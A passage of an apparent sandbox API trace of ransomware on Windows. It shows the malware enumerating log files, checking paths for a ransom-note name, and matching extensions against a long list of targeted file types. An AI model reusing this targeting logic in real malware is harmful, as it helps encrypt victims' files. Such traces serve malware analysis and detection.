rg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".etl") returned 0x0
	[0179.207] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0x95f9994e, ftLastAccessTime.dwHighDateTime=0x1d7046d, ftLastWriteTime.dwLowDateTime=0x95f9994e, ftLastWriteTime.dwHighDateTime=0x1d7046d, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="UpdateSessionOrchestration.012.etl", cAlternateFileName="UPEBF6~1.ETL")) returned 1
	[0179.207] lstrcmpW (lpString1="UpdateSessionOrchestration.012.etl", lpString2="..") returned 1
	[0179.207] lstrcmpW (lpString1="UpdateSessionOrchestration.012.etl", lpString2=".") returned 1
	[0179.207] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\All Users\\USOShared\\Logs\\" | out: lpString1="C:\\Users\\All Users\\USOShared\\Logs\\") returned="C:\\Users\\All Users\\USOShared\\Logs\\"
	[0179.207] lstrcatW (in: lpString1="C:\\Users\\All Users\\USOShared\\Logs\\", lpString2="UpdateSessionOrchestration.012.etl" | out: lpString1="C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.012.etl") returned="C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.012.etl"
	[0179.207] lstrlenW (lpString="C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.012.etl") returned 68
	[0179.207] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0179.208] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.012.etl", cchLength=0x44 | out: lpsz="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.012.etl") returned 0x44
	[0179.208] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.208] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.012.etl", lpSrch="help_decrypt_your_files") returned 0x0
	[0179.208] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.012.etl" | out: lpString1="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.012.etl") returned="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.012.etl"
	[0179.208] lstrlenW (lpString="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.012.etl") returned 68
	[0179.208] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0179.208] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.209] StrStrW (lpFirst=".etl", lpSrch=".") returned=".etl"
	[0179.209] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.209] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".etl") returned 0x0
	[0179.209] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0x9ee92c6a, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0xc6371102, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="UpdateSessionOrchestration.013.etl", cAlternateFileName="UP8DEE~1.ETL")) returned 1
	[0179.209] lstrcmpW (lpString1="UpdateSessionOrchestration.013.etl", lpString2="..") returned 1
	[0179.209] lstrcmpW (lpString1="UpdateSessionOrchestration.013.etl", lpString2=".") returned 1
	[0179.209] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\All Users\\USOShared\\Logs\\" | out: lpString1="C:\\Users\\All Users\\USOShared\\Logs\\") returned="C:\\Users\\All Users\\USOShared\\Logs\\"
	[0179.209] lstrcatW (in: lpString1="C:\\Users\\All Users\\USOShared\\Logs\\", lpString2="UpdateSessionOrchestration.013.etl" | out: lpString1="C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.013.etl") returned="C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.013.etl"
	[0179.210] lstrlenW (lpString="C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.013.etl") returned 68
	[0179.210] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0179.210] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.013.etl", cchLength=0x44 | out: lpsz="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.013.etl") returned 0x44
	[0179.210] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.210] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.013.etl", lpSrch="help_decrypt_your_files") returned 0x0
	[0179.210] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.013.etl" | out: lpString1="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.013.etl") returned="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.013.etl"
	[0179.210] lstrlenW (lpString="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.013.etl") returned 68
	[0179.210] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0179.211] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.211] StrStrW (lpFirst=".etl", lpSrch=".") returned=".etl"
	[0179.211] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.211] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".etl") returned 0x0
	[0179.211] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xe7e7af85, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xe7e7af85, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="UpdateSessionOrchestration.014.etl", cAlternateFileName="UPDATE~4.ETL")) returned 1
	[0179.211] lstrcmpW (lpString1="UpdateSessionOrchestration.014.etl", lpString2="..") returned 1
